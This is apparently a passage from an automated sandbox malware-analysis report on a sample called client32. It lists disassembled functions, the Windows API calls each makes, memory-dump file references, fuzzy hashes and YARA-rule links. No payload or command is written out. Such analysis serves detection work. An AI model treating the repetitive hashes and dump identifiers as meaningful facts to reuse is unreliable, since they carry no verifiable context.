                                                                                                                                                                                • Instruction ID: c3cee1b6b22d45073264887edccfc8dbbb46eef3a7360ad418ef0f3f90be1ef1
                                                                                                                                                                                • Opcode Fuzzy Hash: e245dc8b85a007af01e470ee7c18d2676676128a69ad62e56e432da1ca6298b9
                                                                                                                                                                                • Instruction Fuzzy Hash: BBC08C702006245BE3900F48BC04081F694AF04900300882AE070C3600D160A8008F80
                                                                                                                                                                                Function 11060820 Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                                                • std::exception::exception.LIBCMT ref: 110608C3
                                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 110608D8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Exception@8Throwstd::exception::exceptionwsprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 491363124-0
                                                                                                                                                                                • Opcode ID: c0da650f9becf45ad5bfc463ff8a3a33515e929a93936a520bd9aa6b812cde8f
                                                                                                                                                                                • Instruction ID: 40c1b550870c83f0c669b419c7937a1de5292af9ae005a9ffb354a33ebb971cd
                                                                                                                                                                                • Opcode Fuzzy Hash: c0da650f9becf45ad5bfc463ff8a3a33515e929a93936a520bd9aa6b812cde8f
                                                                                                                                                                                • Instruction Fuzzy Hash: F11181BA900609AFC715CF99C840ADAF7F8FB58614F10863EE91997740E774E904CBE1
                                                                                                                                                                                Function 11145010 Relevance: 3.0, APIs: 2, Instructions: 34windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11145031
                                                                                                                                                                                • ExtractIconExA.SHELL32(?,00000000,000A0437,000D0425,00000001), ref: 11145068
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExtractFileIconModuleName
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3911389742-0
                                                                                                                                                                                • Opcode ID: 90d4230a89f8c2a8b39fdc8412d64446a63d2c46ddeae3ef9f096b7f1b610649
                                                                                                                                                                                • Instruction ID: 51784f3a6cc6e5149e616e04a2eb2c6e0d372b09ba8f06c96ffc5d3ba3765e1d
                                                                                                                                                                                • Opcode Fuzzy Hash: 90d4230a89f8c2a8b39fdc8412d64446a63d2c46ddeae3ef9f096b7f1b610649
                                                                                                                                                                                • Instruction Fuzzy Hash: F5F0BB79A4411C5FE718DFA0CC51FF9B36AE784709F444269E956D61C4CE70594CC741
                                                                                                                                                                                Function 11164C77 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __fclose_nolock__lock_file
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3858814730-0
                                                                                                                                                                                • Opcode ID: 271288d31555c81154ec7293090fb485e1e9931888df87aecff959c56407cd41
                                                                                                                                                                                • Instruction ID: afac539be2367be23e5fb54bb350a7e23aa7a519b2fcc5708fa11322496ce6e3
                                                                                                                                                                                • Opcode Fuzzy Hash: 271288d31555c81154ec7293090fb485e1e9931888df87aecff959c56407cd41
                                                                                                                                                                                • Instruction Fuzzy Hash: B4F0F0358017138AD7109B78CC0078EFBE96F0133CF1182088434AA6D4CBFA6521DB46
                                                                                                                                                                                Function 6C616C1E Relevance: 3.0, APIs: 2, Instructions: 30sleepCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 6C616C26
                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 6C616C5B
                                                                                                                                                                                  • Part of subcall function 6C616940: GetTickCount.KERNEL32 ref: 6C616950
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3007256676.000000006C601000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3007234393.000000006C600000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007315728.000000006C640000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007336466.000000006C649000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007443449.000000006C650000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_6c600000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountTick$Sleep
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4250438611-0
                                                                                                                                                                                • Opcode ID: 596c7e3dede7b4f14961433daa3d8da6a76576373e2832d88e47f181fc92eaca
                                                                                                                                                                                • Instruction ID: 829ce6cfd86665d595f43d682d7bd903942d6ebc5544c2d93d8d47a81c7e7101
                                                                                                                                                                                • Opcode Fuzzy Hash: 596c7e3dede7b4f14961433daa3d8da6a76576373e2832d88e47f181fc92eaca
                                                                                                                                                                                • Instruction Fuzzy Hash: 36F030357081048ECF14FA7AD584368B2B2DBA235EF11C02AC512D5E90C7B48888CB0E
                                                                                                                                                                                Function 6C6063A0 Relevance: 3.0, APIs: 2, Instructions: 10sleepnetworkCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • WSACancelBlockingCall.WSOCK32 ref: 6C6063A9
                                                                                                                                                                                • Sleep.KERNEL32(00000032), ref: 6C6063B3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3007256676.000000006C601000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3007234393.000000006C600000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007315728.000000006C640000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007336466.000000006C649000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007443449.000000006C650000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_6c600000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: BlockingCallCancelSleep
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3706969569-0
                                                                                                                                                                                • Opcode ID: a54de6a0c922552be17be0304618ab9aa28d575098ff5e260ee247ab671f82e8
                                                                                                                                                                                • Instruction ID: a2bf24698a24eb9b0dc8fc2e7c765225308ba921cd8dd9e316119cb3fb7beaf1
                                                                                                                                                                                • Opcode Fuzzy Hash: a54de6a0c922552be17be0304618ab9aa28d575098ff5e260ee247ab671f82e8
                                                                                                                                                                                • Instruction Fuzzy Hash: 2DB092A039216049EB0C23720A0629A20980FA674BF60A4A82F41E8D85EF25C144A8AE
                                                                                                                                                                                Function 11145A70 Relevance: 2.6, APIs: 2, Instructions: 58sleepCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 11145990: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,75C07310), ref: 111459B7
                                                                                                                                                                                  • Part of subcall function 11164EAD: __fsopen.LIBCMT ref: 11164EBA
                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,000000FF,?), ref: 11145AA5
                                                                                                                                                                                • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,000000FF,?), ref: 11145AB5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3768737497-0
                                                                                                                                                                                • Opcode ID: e2e6687f1a473fa066f8a0a4b522ed97ac7095e3844236bd75cb01935a59ff1f
                                                                                                                                                                                • Instruction ID: 034c310a398a014eacf4d95463f41bd89d414178975837bd0fbb5aed6b89dd46
                                                                                                                                                                                • Opcode Fuzzy Hash: e2e6687f1a473fa066f8a0a4b522ed97ac7095e3844236bd75cb01935a59ff1f
                                                                                                                                                                                • Instruction Fuzzy Hash: E8110476940319ABEB119F90CDC4A6FF3B8EF85A29F300165EC0097A00D775AD51C7A2
                                                                                                                                                                                Function 11010AE0 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 11010B94
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LockitLockit::_std::_
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3382485803-0
                                                                                                                                                                                • Opcode ID: 900fd30ae7a6edcb6a0dfa434b7c013aaa35b72064ad6defd4f97f4d13ad8da4
                                                                                                                                                                                • Instruction ID: 6fbf298b81733ad5c02794b6394837a2ddc0a350229d48e3ddb53e27456ddbdc
                                                                                                                                                                                • Opcode Fuzzy Hash: 900fd30ae7a6edcb6a0dfa434b7c013aaa35b72064ad6defd4f97f4d13ad8da4
                                                                                                                                                                                • Instruction Fuzzy Hash: F1516B74A00649DFDB04CF98C980AADFBF5BF89318F248298D5469B385C776E942CB90
                                                                                                                                                                                Function 11075090 Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,0262E498,1104CCD2), ref: 11075159
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                                • Opcode ID: 4e56bc08cf6d4b85bc31047bf59587d3794f3c6155dff5afacd053865e97b66c
                                                                                                                                                                                • Instruction ID: 75615663fc9b5e204bff5cdf828812fccbd9a8c0715bb2e01743ee940980502e
                                                                                                                                                                                • Opcode Fuzzy Hash: 4e56bc08cf6d4b85bc31047bf59587d3794f3c6155dff5afacd053865e97b66c
                                                                                                                                                                                • Instruction Fuzzy Hash: 28219276E01268A7D710DE95EC41BEFBBBCFB44315F4041AAE90997200EB729A50CBE1
                                                                                                                                                                                Function 11143BD0 Relevance: 1.6, APIs: 1, Instructions: 70registryCOMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,11110200,75BF8400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: QueryValue
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3660427363-0
                                                                                                                                                                                • Opcode ID: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
                                                                                                                                                                                • Instruction ID: ee220ac459adc96ef86e18eb3808082b68f6554a37139a9005b103db31ef1b78
                                                                                                                                                                                • Opcode Fuzzy Hash: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
                                                                                                                                                                                • Instruction Fuzzy Hash: 2611B97171C2795FEB15CE46D690AAEFB6AEBC5F14F30816BE51947D00C332A482C754
                                                                                                                                                                                Function 110FB470 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,111817C4), ref: 110FB49D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InformationToken
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4114910276-0
                                                                                                                                                                                • Opcode ID: 94d1a49877d821fc99a49a33a12423ca82d395021749feafa8c85b0fdaa7c31d
                                                                                                                                                                                • Instruction ID: 0dd0dc8a76de1486b7c0157bd4876b78410922a839ecfb631160e4ccf4e8658d
                                                                                                                                                                                • Opcode Fuzzy Hash: 94d1a49877d821fc99a49a33a12423ca82d395021749feafa8c85b0fdaa7c31d
                                                                                                                                                                                • Instruction Fuzzy Hash: E1118671A0055D9BDB11CFA8DD51BEEB3E8DB48309F0041D9E9499B340EA70AE488B90
                                                                                                                                                                                Function 6C62A082 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000008,6C626F16,00000000,?,6C62D40B,00000001,6C626F16,00000000,00000000,00000000,?,6C626F16,00000001,00000214), ref: 6C62A0C5
                                                                                                                                                                                  • Part of subcall function 6C6260F9: __getptd_noexit.LIBCMT ref: 6C6260F9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3007256676.000000006C601000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3007234393.000000006C600000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007315728.000000006C640000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007336466.000000006C649000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007443449.000000006C650000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_6c600000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocateHeap__getptd_noexit
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 328603210-0
